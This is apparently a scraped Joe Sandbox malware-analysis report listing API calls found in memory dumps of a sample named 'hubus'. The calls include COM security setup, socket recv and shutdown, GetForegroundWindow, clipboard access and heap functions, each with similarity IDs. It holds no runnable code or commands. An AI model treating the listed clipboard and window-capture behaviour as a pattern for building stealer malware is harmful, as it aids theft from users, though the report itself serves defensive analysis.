                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                                              • String ID: uhij
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EBB5
                                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EBCD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000008,?,?,?,?,?,?,00000000,00000001,0041F9AA,?), ref: 0041FF62
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043C12C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • shutdown.WS2_32(?,00000002), ref: 0041CE26
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: shutdown
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5F3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,?,00000000,0040B2E1,00000000,00000001,?,00000000), ref: 0043A905
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043C30C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                              • String ID: +$?$O$Q$W$`$b$c$n$q$r$|
                                                                                                                                                                                                                                                              • API String ID: 2832541153-2449071873
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID: ,940$-$?$49$8:6?
                                                                                                                                                                                                                                                              • API String ID: 3664257935-1315884853
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                                                                              • String ID: $!$$$%$&$)$)$-$-$0$2$4$6$>$A$C$E$G$I$K$M$O$Q$S$U$W$Y$Yz{@#^Q$[$]$_$g$i$k$m$o
                                                                                                                                                                                                                                                              • API String ID: 2525500382-522938286
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                              • String ID: %$'$)$+$-$/$1$3$5$7$9$:$;$|
                                                                                                                                                                                                                                                              • API String ID: 2610073882-2490240685